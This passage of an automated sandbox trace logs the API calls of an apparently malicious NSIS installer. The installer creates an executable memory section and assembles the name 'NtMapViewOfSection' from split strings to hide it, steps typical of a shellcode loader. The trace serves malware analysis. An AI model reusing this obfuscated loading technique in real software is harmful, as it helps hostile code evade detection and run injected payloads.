r2, i 14, n,", iMaxLength=1024 | out: lpString1="ntdll::NtCreateSection(p r2, i 14, n,") returned="ntdll::NtCreateSection(p r2, i 14, n," [0030.073] lstrlenA (lpString="ntdll::NtCreateSection(p r2, i 14, n,") returned 37 [0030.073] lstrcpynA (in: lpString1=0x5d14fc, lpString2="ntdll::NtCreateSection(p r2, i 14, n, p r1, i\x09 \x09 \x09 0x40, i 0x8000000, n)", iMaxLength=1024 | out: lpString1="ntdll::NtCreateSection(p r2, i 14, n, p r1, i\x09 \x09 \x09 0x40, i 0x8000000, n)") returned="ntdll::NtCreateSection(p r2, i 14, n, p r1, i\x09 \x09 \x09 0x40, i 0x8000000, n)" [0030.073] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.073] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.073] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.073] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.073] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.073] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.073] lstrcpyA (in: lpString1=0x5cb908, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0030.073] lstrcpyA (in: lpString1=0x5cbd18, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0030.073] lstrcpyA (in: lpString1=0x5cc118, lpString2="NtCreateSection" | out: lpString1="NtCreateSection") returned="NtCreateSection" [0030.074] GetModuleHandleA (lpModuleName="ntdll") returned 0x77190000 [0030.074] GetProcAddress (hModule=0x77190000, lpProcName="NtCreateSection") returned 0x771f9080 [0030.074] lstrcpynA (in: lpString1=0x5cb908, lpString2="5955696", iMaxLength=1024 | out: lpString1="5955696") returned="5955696" [0030.074] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.074] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="5955600", iMaxLength=1024 | out: lpString1="5955600") returned="5955600" [0030.074] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.074] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.074] NtCreateSection (in: SectionHandle=0x5ae070, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x5ae010, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x5ae070*=0x208) returned 0x0 [0030.074] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="134217728") returned 9 [0030.074] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="64") returned 2 [0030.074] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955600") returned 7 [0030.074] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="14") returned 2 [0030.074] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955696") returned 7 [0030.074] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.074] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.074] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.074] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.074] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.074] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.074] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.074] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.074] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.074] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.074] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.075] lstrcpynA (in: lpString1=0x5d32f4, lpString2="*(p 0)\x09 \x09 \x09 p .r3", iMaxLength=1024 | out: lpString1="*(p 0)\x09 \x09 \x09 p .r3") returned="*(p 0)\x09 \x09 \x09 p .r3" [0030.075] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.075] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.075] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.075] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.075] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.075] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.075] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.075] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.075] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="0") returned 1 [0030.075] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955360") returned 7 [0030.075] lstrcpyA (in: lpString1=0x424c00, lpString2="5955360" | out: lpString1="5955360") returned="5955360" [0030.075] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.075] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.075] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.075] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.075] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.075] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.075] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.075] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.075] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.075] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.076] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.076] lstrcpynA (in: lpString1=0x5d1d8c, lpString2="*(i 0) p \x09\x09 .r4", iMaxLength=1024 | out: lpString1="*(i 0) p \x09\x09 .r4") returned="*(i 0) p \x09\x09 .r4" [0030.076] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.076] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.076] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.076] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.076] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.076] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.076] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.076] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.076] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="0") returned 1 [0030.076] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955712") returned 7 [0030.076] lstrcpyA (in: lpString1=0x425000, lpString2="5955712" | out: lpString1="5955712") returned="5955712" [0030.076] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.076] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.076] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.076] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.076] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.076] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.076] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.076] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.076] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.077] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.077] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.077] lstrcpynA (in: lpString1=0x4226c1, lpString2="5955696", iMaxLength=1024 | out: lpString1="5955696") returned="5955696" [0030.077] lstrlenA (lpString="5955696") returned 7 [0030.077] lstrcpynA (in: lpString1=0x5d1d8c, lpString2="*5955696( p\x09 .r2)", iMaxLength=1024 | out: lpString1="*5955696( p\x09 .r2)") returned="*5955696( p\x09 .r2)" [0030.077] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.077] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.077] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.077] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.077] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.077] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.077] lstrcpyA (in: lpString1=0x5cc118, lpString2="5955696" | out: lpString1="5955696") returned="5955696" [0030.077] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.077] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.077] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="520") returned 3 [0030.077] lstrcpyA (in: lpString1=0x424800, lpString2="520" | out: lpString1="520") returned="520" [0030.077] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.077] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.078] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.078] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.078] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.078] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.078] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.078] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.078] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.078] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.078] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.078] lstrcpynA (in: lpString1=0x5d1d8c, lpString2="*(&t255) p .r5", iMaxLength=1024 | out: lpString1="*(&t255) p .r5") returned="*(&t255) p .r5" [0030.078] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.078] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.078] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.078] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.078] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.078] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.078] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.078] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.078] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.078] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.079] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.079] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5938968") returned 7 [0030.079] lstrcpyA (in: lpString1=0x425400, lpString2="5938968" | out: lpString1="5938968") returned="5938968" [0030.079] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.079] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.079] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.079] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.079] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.079] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.079] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.079] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.079] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.079] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.079] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.079] lstrcpynA (in: lpString1=0x5d21d4, lpString2="user32::wsprintf(p r5, t 'll::%s%s%s%s%d' , t 'NtM', \x09\x09t 'apVi', t 'ewOfSect',\x09 t 'ion(p r', i 2)", iMaxLength=1024 | out: lpString1="user32::wsprintf(p r5, t 'll::%s%s%s%s%d' , t 'NtM', \x09\x09t 'apVi', t 'ewOfSect',\x09 t 'ion(p r', i 2)") returned="user32::wsprintf(p r5, t 'll::%s%s%s%s%d' , t 'NtM', \x09\x09t 'apVi', t 'ewOfSect',\x09 t 'ion(p r', i 2)" [0030.079] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.079] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.079] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.079] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.079] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.079] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.079] lstrcpyA (in: lpString1=0x5cb908, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.079] lstrcpyA (in: lpString1=0x5cbd18, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.080] lstrcpyA (in: lpString1=0x5cc118, lpString2="wsprintf" | out: lpString1="wsprintf") returned="wsprintf" [0030.080] lstrcpynA (in: lpString1=0x5cd1c0, 